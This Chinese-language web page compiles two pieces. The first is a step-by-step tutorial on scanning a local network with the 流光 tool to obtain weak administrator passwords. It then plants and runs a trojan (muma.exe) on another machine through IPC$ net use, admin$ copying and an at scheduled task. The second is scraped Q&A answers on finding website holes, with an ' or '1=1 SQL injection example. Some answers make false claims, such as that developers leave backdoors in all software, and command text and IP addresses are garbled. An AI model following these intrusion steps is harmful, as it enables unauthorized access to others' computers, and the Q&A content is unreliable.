❶ 看看區域網內的電腦有哪些可用漏洞
刺探!看看區域網內的電腦有哪些可用漏洞
自己的電腦處於區域網中,難免會手癢癢想對區域網中其他電腦進行一次入侵檢測,如果靠自己手動一個一個檢測,肯定費時又費力。其實我們可以藉助一些專業安全軟體來完成漏洞的檢測工作,例如「流光」。 什麼是流光?
流光是國內著名程序員小榕編寫的安全掃描工具,曾在國內黑客發展萌芽時期風靡黑客界,其功能強大程度在目前來說還是排在國內同類軟體的首位。其具有「POP3/FTP/…探測」、「IPC探測」、「SQL探測」、「高級掃描」、「其它」五大探測項,幾乎能夠檢測到電腦安全性的方方面面。並且操作簡便,容易上手,是黑客新手尋找肉雞、把妹妹的必備良葯。
一次完整的「流光」入侵檢測
耳聽為虛,眼見為實,「流光」真的有傳說中那麼強嗎?我們還是來實際進行一次入侵檢測,看看「流光」是怎樣打開對方電腦的大門的。由於是區域網檢測,因此我們採用經典的IPC$入侵,通過「流光」完成整個入侵過程。
安裝「流光」
「流光」和普通應用程序一樣,在使用前需要先安裝,「流光」對系統的要求是Win NT/2000以上,相信現在已經極少有朋友還在使用98吧。「流光」的安裝過程並不難,一路點擊「下一步」即可完成。 探測漏洞
安裝完成後運行,在軟體主界面選擇「探測」菜單→「探測POP3/FTP/NT/SQL主機」選項,或者直接按Ctrl+R彈出配置窗口。在「開始地址」和「結束地址」中填入需要掃描的IP段,由於是區域網檢測,因此可以在這里填入區域網的IP段,一般是192.168.1.1-192.168.1.255。然後在「掃描主機類型」處選擇「NT/98」。接著把「FrontPage主機自動加入HTTP主機列表」選項前的鉤取消。
設置完成後,點擊「開始」按鈕進行掃描,很快我們就得到了192.168.1.19這台計算機的管理員賬戶,用戶名為administrator,密碼為123456。
利用IPC$入侵
通過「流光」掃描得到的管理員密碼,我們用來進行IPC$入侵。 Step1.點擊「開始」菜單→「運行」,輸入「cmd」運行「命令提示符」。
Step2.輸入命令:net use 92.168.1.19ipc$ "123456" /user:"administrator",回車後可以和目標主機建立ipc$連接。
Step3.輸入命令: muma.exe 92.168.1.19admin$,其中「muma.exe」是遠程式控制制軟體的服務端,當然也可以是其他程序。admin$是目標主機的windows目錄。
Step4.輸入命令:net time 92.168.1.19,查看對方的系統時間。本例中為AM11:02。
Step5.輸入命令:at 92.168.1.19 11:04 muma.exe,回車後我們就用at命令在目標電腦上創建一條計劃任務,目的是讓我們的木馬通過計劃任務運行。 當目標主機的時間達到11:04時,木馬就自動運行了。
❷ 如何發現網站漏洞
問題一:黑客怎麼尋找網站漏洞,麻煩說一下! 拿站這技術活得靠點經驗,我簡單說下吧(我是菜鳥)。之前,很多網站一恭存在注入漏洞,就像一樓那樣說的,很多菜菜都是用啊D,明小子等軟體(本人絕無看不起軟體作者之意,打心底佩服前輩們),但是現在隨著國家發展強大,人民的生活水平提高,很多管理員動不動就裝個防注系統(繞過防注這里我不說),以前操起工具就日下一大堆站的日子一去不復返了。有些管理員粗心,導致出現上傳漏洞,雖然過濾很嚴,但是這樣的漏洞一般比較致命,或者人家防火牆很厲害,馬兒進一匹死一匹,這種漏洞一般是通過掃描出來的。也有一些管理員沒有改密碼,通過弱口令直接進去後台,還有一些後台頁面直接爆出密碼(很久了),還有就是爆庫,資料庫被爆出來~很多很多,說不完~望樓主採納。
問題二:黑客是如何發現系統漏洞的,系統為什麼會有漏洞? 不要為難微軟,畢竟微軟寫WINDOWS的傢伙們也都是人,雖然不是中國人。
只要是人做出來的東西,就沒有完美的,所以有問題也不奇怪。
這就好像一個打字員打了一篇稿子,打字員本身發現錯字的可能性很小,倒是別人一眼就可以看到打字員打錯的字。
雖然不知道這是為什麼,但真的是這樣。(以前我打字的時候就發現不到自己的錯字)
至於你的問題,微軟當初在編寫系統的時候為什麼不知道有漏洞?
回答:很多所謂的漏洞都不算是漏洞,都是正常的數據值,所以不容易被發現。
舉個例子,在檢測一些ASP網站的時候,會用到1=1 OR 1=2 之類的語句,
這本身是ASP的一種正常的程序語句,但是到了黑客手中,就成了檢測ASP網站的重要檢查項目,
黑客會根據檢測網站返回的數據值,而得到大量的信息。
有的黑客可以自己發現漏洞,他們是靠什麼技術發現的?
回答:說實話,這個問題我個人覺得問題很好。
黑客一詞,在以前的時候,是用來形容懂得計算機編程,擁供很好的計算機技術並且熱心於鑽研計算機技術的人
對於這種人,發現一些漏洞也是很正常的,就好像WIN2000的輸入法漏洞,就是中國人發現的。
其實只要你用某種系統習慣了,也會發現很多漏洞。比如XP,現在盜版的XP漏洞很多,只要你細心點,
你就會發讓野現很多的XP漏洞。
問題三:如何看一個網站有沒有漏洞、有什麼漏洞? 沒有一定足夠的程序能力沒有一定的網路安全經驗你是無法膽接判斷的,
對於這些初級菜鳥,只能藉助檢測工具來初略判斷。
問題四:黑客是怎麼樣去攻擊網站的,漏洞是怎坦褲喊么發現的? 網上所謂黑客入侵某某網站,都是根據目前公開的漏洞或者根據別人發掘的漏洞進行入侵的,入侵了後台就把木馬後門上傳伺服器內,實現控制目的,黑客攻擊網站主要是發送大量數據包,讓網站不能正常訪問等,本人收徒,學會再收費!
問題五:如何掃描網站的漏洞? 需要確定他使用的伺服器版本,還需要了解他的安全措施。他開了定0埠,至少可以D。O。S。PS:小心觸犯法律!
問題六:怎樣才純孫能找到網站漏洞 怎麼說那 是沒有檢測出來漏洞 才導致的
網站作了很好的硬體防火牆
沒辦法拉
這可是不道德的 注意
問題七:入侵網站的漏洞是怎麼生成的? 為什麼會有漏洞呢、謝謝了,大神幫忙啊 你好。樓主,關於你的這個問題很高興我來替你回答 所有網站和軟體的一般剛剛開始的時候是沒有多大問題的漏洞的,一般程序員在設定軟體的時候都是把軟體和網站分成模塊來做的,分為模塊1 或者模塊ABCD 這樣來的,每個軟體和網站都有後門的,因為這樣方便程序員測試網站,和所有的黑客一樣,入侵網站都是先找後門,利用後門程序向你的伺服器發送大量郵件,這就是垃圾信息郵件攻擊法,讓你的伺服器被信息撐爆,卡死,甚至癱瘓,第2種就是特洛伊木馬,向你的伺服器發送郵件,並帶上木馬程序,只要你運行了郵件中的附帶件,那麼,木馬就會潛入你的伺服器程序,在你不知不覺中得到他想要的信息,第3種就是直接發送網路炸彈到你的 伺服器使你的伺服器癱瘓死機,這種方法 很不人道,所以一半人不會用這種!其實漏洞就是所謂的後門,所有軟體和網站的後門都是程序員留著的。這樣也並不是說他們有什麼不良企圖,而是方便他們日後對軟體或者網站進行測試,修改,所以一般的程序員都會把這後門留著,後門如果被有不良企圖的人知道了,那麼就成了所謂的漏洞了。 如果樓主對我的回答還滿意的話,可以用五星來采為滿意答案
問題八:網站怎樣樣檢查漏洞 您好,現在一般是使用站長工具,我現在用了網路站長工具,如果網站有問題,系統會提示的,而且可以使用漏洞檢查軟體或在線工具直接可以檢測,還有就是如果是大型網站可以考慮做加密,加強網站的安全性能。工具您可以網路看看。
問題九:網路怎麼學習找漏洞。 這是我在網上看到的,希望對樓住有所幫助一 如何尋找漏洞
這個是大家最關心的。大家尋找漏洞只能尋找能讀到源代碼碼的,沒有源代碼但有注入漏洞的系統只能猜,具有特殊性。網上很多主機用的是成品,它的系統源代碼可以從網上下到。至於如何判斷主機用的是哪個系統,就需要大家有一定的積累了。這也沒法用語言描述,我舉個簡單的例子。
以動網6為例,看到某個論壇界面酷似動網,9成是動網論壇,再看看下面的版本就知道是動網6了。這個時候就可以去Chinaz下個動網6來讀一下,不會ASP的就沒辦法了。當然漏洞早就公布,我只是告訴大家如何判斷主機用哪個WEB系統。
漏洞是如何被發現的呢?其實也沒什麼訣竅,主要是扎實的基礎知識,要是連HTTP協議不懂,不會抓包,也別找漏洞了,找到也不會用,這樣最好先補基礎知識。有了基礎知識,剩下的就是毅力和耐心。論能力,現在好多系統漏洞,張三找的到,李四也找的到。
主要是看誰先找,誰下的工夫深。有的漏洞讀一遍源碼是找不到的。
找漏洞的過程也是熟悉這個WEB系統的過程,首先要了解它的資料庫結構,這是最基本的。接下來就得一個文件一個文件的讀。先讀不需要許可權的。
有的頁面開頭就來個SESSION判斷,就算下面有漏洞都沒用。
找漏洞的過程其實就是一個文件一個文件讀的過程。下面以一個頁面為例。首先把握系統流程。所謂系統的流程就是系統到底如何執行。一般系統為 開頭――中間――結尾 模式。開頭一般是輸出HTML中之間內容,對我們找漏洞沒有影響。
一般文件開頭都會包含很多頭文件,大家看了感到頭暈,其實頭文件都沒什麼用。主要是資料庫連接文件,全局配置文件,和函數庫。我們大可不理會這些東西,再找漏洞時用到了回頭再看也不遲。
但是函數庫裡面關於輸入串過濾的函數要重點看一下。
結尾是輸出系統版權信息,有的用到SQL查詢,不過這里用處也不大,我們可以很粗略的看一下。
中間部分是我們重點關注的地方。其次重點關注輸入變數。因為這些變數是我們控制的,沒有外來輸入變數也不用談注入了。
大家要有這樣一種概念,不管是GET,POST,還是COOKIE方法,只有是從用戶提交的變數都可以由我們指定,我們想讓它是多少就是多少。
至於系統取得變數後做了什麼過濾是另外一回事。
在輸入變數中要重點關注能參與SQL執行的變數,有的變數比如action或者page都是控制流程的,根本就沒用,就算改了值也沒什麼意思。再者就要深刻了解資料庫了,沒有對資料庫全面的把握,很可能錯失很多注入點,這也是高手和菜鳥最大的差別所在。
我們常見的資料庫有Access、Mysql和SQLServer,至少要對他們有很深的了解才能找出漏洞。二 分三個方面並舉實例講解注入點的尋找及利用
1 注入點很容易發現,利用也很簡單
這種漏洞相信已經很少了,除非程序作者根本就不關心程序的安全才會有此漏洞。以前經典的 ' or '1=1就屬於此類
典型的類似(模型,以下類同)
select * from tablename where user='request(user)',
select * from tablename where id=request(id)
有的程序對這些變數做了過濾,但不全,也可以歸結為這一類。
相信這樣的漏洞大家都能發現而且也很容易利用,更不用說防範了。這種漏洞容易找,也很少。我給大家截了幾個有漏洞的......>>
問題十:如何發現網站的漏洞啊?我是好人 你這個問題問題有點沒人敢答
這不是一個問題而是一萬個為什麼...
就像 我問你:如何做一桌子好吃的菜?
你說呢?
最真實的回答就是 你要去學,學什麼呢?就像別說一桌子菜
就算一道菜.
你要從選料 ,配料,加工,到炒制,甚至大廚還要學色彩搭配以及雕刻藝術
再深入的甚至要學比如豆子的生長過程,營養成分,以及地區差異
才能選出自己想要的好豆子...
那如何發現網站漏洞??????
那你就得從程序入手,為什麼會存在漏洞,存在漏洞的基礎條件
asp,php,net,c++.....等等程序代碼與伺服器系統的關系
myssql,sql與系統的關系
等等 各種基礎要素理解透徹之後
才可以有利於你發現漏洞
再然後才是根據這些缺點 弊端 去彌補漏洞 做到所謂的安全貢獻
另外 你也說你是個好人,是一個互聯網相關的好人
說明你對互聯網有一定的了解
我認為你不是在指望這里一問一答的...就能學會一門多年磨練才能有手藝吧???
更何況是技術含量的
先祝你成功吧
您的採納 是咱互助的動力源泉,理解萬歲